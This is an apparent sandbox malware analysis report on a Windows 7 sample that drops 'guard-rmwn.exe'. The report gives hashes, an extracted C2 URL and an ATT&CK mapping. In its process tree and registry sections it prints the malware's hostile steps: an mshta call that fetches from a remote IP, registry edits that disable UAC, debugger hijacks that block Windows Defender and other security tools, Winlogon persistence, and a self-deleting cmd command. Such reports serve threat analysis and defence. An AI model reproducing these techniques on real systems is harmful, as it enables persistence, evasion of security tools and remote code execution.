Analysis
-
max time kernel
8s -
max time network
6s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system -
submitted
02/03/2024, 16:41
Static task
static1
Errors
General
-
Target
-
Size
1023KB
-
MD5
981931159e45242cc1c3dcbdb47846d7
-
SHA1
875bd5c00a30df19216e7f08bc18d97490ed25a6
-
SHA256
69461917822ca791194992d7b7d01e12afbf0eb86ae327b3fb86df01012e060e
-
SHA512
ffad32e77bcd989a20e1226021280204ded3e4ba7987e02978859be966e454785a0c0e196397378ad47d57f251764aeade3836127fe94ef67800342591fc63ce
-
SSDEEP
24576:A+nV9M1Yek6EYqNc4p9cAnlwDUctAaxu190ryaJqc5D9X32pVa:A+nsr1E66eAnEUc6CuEryaJqc5RWpVa
Malware Config
Extracted
http://93.115.82.248/?0=1&1=1&2=9&3=i&4=7601&5=1&6=1111&7=nqrhshtdur
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\guard-rmwn.exe" guard-rmwn.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" guard-rmwn.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" guard-rmwn.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" guard-rmwn.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 7 2140 mshta.exe -
Sets file execution options in registry 2 TTPs 12 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe guard-rmwn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe\Debugger = "svchost.exe" guard-rmwn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger = "svchost.exe" guard-rmwn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe guard-rmwn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe guard-rmwn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe\Debugger = "svchost.exe" guard-rmwn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe guard-rmwn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe\Debugger = "svchost.exe" guard-rmwn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe\Debugger = "svchost.exe" guard-rmwn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe guard-rmwn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe guard-rmwn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe\Debugger = "svchost.exe" guard-rmwn.exe -
Deletes itself 1 IoCs
pid Process 2444 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 2544 guard-rmwn.exe -
Loads dropped DLL 2 IoCs
pid Process 1636 [email protected] 1636 [email protected] -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" guard-rmwn.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 4 checkip.dyndns.org -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe 2544 guard-rmwn.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2544 guard-rmwn.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2544 guard-rmwn.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 1636 [email protected] 2544 guard-rmwn.exe 2544 guard-rmwn.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1636 wrote to memory of 2544 1636 [email protected] 28 PID 1636 wrote to memory of 2544 1636 [email protected] 28 PID 1636 wrote to memory of 2544 1636 [email protected] 28 PID 1636 wrote to memory of 2544 1636 [email protected] 28 PID 1636 wrote to memory of 2444 1636 [email protected] 29 PID 1636 wrote to memory of 2444 1636 [email protected] 29 PID 1636 wrote to memory of 2444 1636 [email protected] 29 PID 1636 wrote to memory of 2444 1636 [email protected] 29 PID 2544 wrote to memory of 2140 2544 guard-rmwn.exe 31 PID 2544 wrote to memory of 2140 2544 guard-rmwn.exe 31 PID 2544 wrote to memory of 2140 2544 guard-rmwn.exe 31 PID 2544 wrote to memory of 2140 2544 guard-rmwn.exe 31 -
System policy modification 1 TTPs 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System guard-rmwn.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" guard-rmwn.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" guard-rmwn.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" guard-rmwn.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableVirtualization = "0" guard-rmwn.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\[email protected]"C:\Users\Admin\AppData\Local\Temp\[email protected]"1⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1636 -
C:\Users\Admin\AppData\Roaming\guard-rmwn.exeC:\Users\Admin\AppData\Roaming\guard-rmwn.exe2⤵
- Modifies WinLogon for persistence
- UAC bypass
- Sets file execution options in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2544 -
C:\Windows\SysWOW64\mshta.exemshta.exe "http://93.115.82.248/?0=1&1=1&2=9&3=i&4=7601&5=1&6=1111&7=nqrhshtdur"3⤵
- Blocklisted process makes network request
PID:2140
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\ENDERM~1.EXE" >> NUL2⤵
- Deletes itself
PID:2444
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1023KB
MD5981931159e45242cc1c3dcbdb47846d7
SHA1875bd5c00a30df19216e7f08bc18d97490ed25a6
SHA25669461917822ca791194992d7b7d01e12afbf0eb86ae327b3fb86df01012e060e
SHA512ffad32e77bcd989a20e1226021280204ded3e4ba7987e02978859be966e454785a0c0e196397378ad47d57f251764aeade3836127fe94ef67800342591fc63ce